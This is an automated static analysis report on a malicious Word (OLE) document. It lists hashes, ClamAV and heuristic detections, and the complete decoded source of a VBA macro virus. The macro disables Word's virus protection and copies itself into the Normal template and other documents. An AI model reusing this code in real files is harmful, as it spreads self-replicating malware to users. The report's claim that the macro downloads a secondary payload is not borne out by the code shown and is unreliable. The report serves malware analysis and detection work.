Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8c998060809032ff…

MALICIOUS

Office (OLE)

Size: 412.0 KB
Created: 2000-11-20 12:19:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 1d3ca8c7ebad7873ebfc29380705e89f
SHA-1: 6cdd23ee6be8f0119c27b175ca3aa6a389d1eab7
SHA-256: 8c998060809032ff55fb0968795fa297437046c45b5ef10222a1fa8aa6d459d0
Risk Score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro designed to execute code upon opening the document. The macro attempts to copy itself to the Normal template, suggesting an attempt at persistence or to infect other documents. The ClamAV detection 'Doc.Trojan.Hisp-1' further indicates malicious intent, likely to download and execute a secondary payload.

Heuristics 3

  • ClamAV: Doc.Trojan.Hisp-1 [critical] [CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.Hisp-1
  • VBA macros detected [medium] [OLE_VBA_MACROS] (1 related finding)
    Document contains VBA macro code
  • Document_Open macro [high] [OLE_VBA_DOCOPEN]
    Document_Open macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1066 bytes
SHA-256: c7cbe46ef45111758bcd7a225f39810423f8b3dcf464291e5420e95623746142
Detection: ClamAV: Doc.Trojan.Hisp-1
Obfuscation or payload: unlikely

First 1,000 lines of the extracted script:

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'<HISpeedFuck>
'Coded by Destroyer Inc° 15.03.2000
Private Sub Document_Close()
    On Error Resume Next
    Options.VirusProtection = False
    Options.ConfirmConversions = False
    Options.SaveNormalPrompt = False
    Set nt = NormalTemplate.VBProject.VBComponents(1).CodeModule
    Set ad = ActiveDocument.VBProject.VBComponents(1).CodeModule
    If ad.Lines(1, 1) <> "'<HISpeedFuck>" Then
       ad.DeleteLines 1, ad.CountofLines
       ad.InsertLines 1, nt.Lines(1, nt.CountofLines)
    End If
    If nt.Lines(1, 1) <> "'<HISpeedFuck>" Then
        nt.DeleteLines 1, nt.CountofLines
        nt.InsertLines 1, ad.Lines(1, ad.CountofLines)
        NormalTemplate.Save
    End If
End Sub
Private Sub Document_New()
Document_Close
End Sub
Private Sub Document_Open()
Document_Close
End Sub

Filename: ole10native_00.bin
Kind: ole-package
Source: OLE Ole10Native stream: ObjectPool/_911684018/Ole10Native
Size: 1732 bytes
SHA-256: ac5b03b85bf0a5d6131a60ba41b10c9fae80450fd2a183b9e69176aae91ad425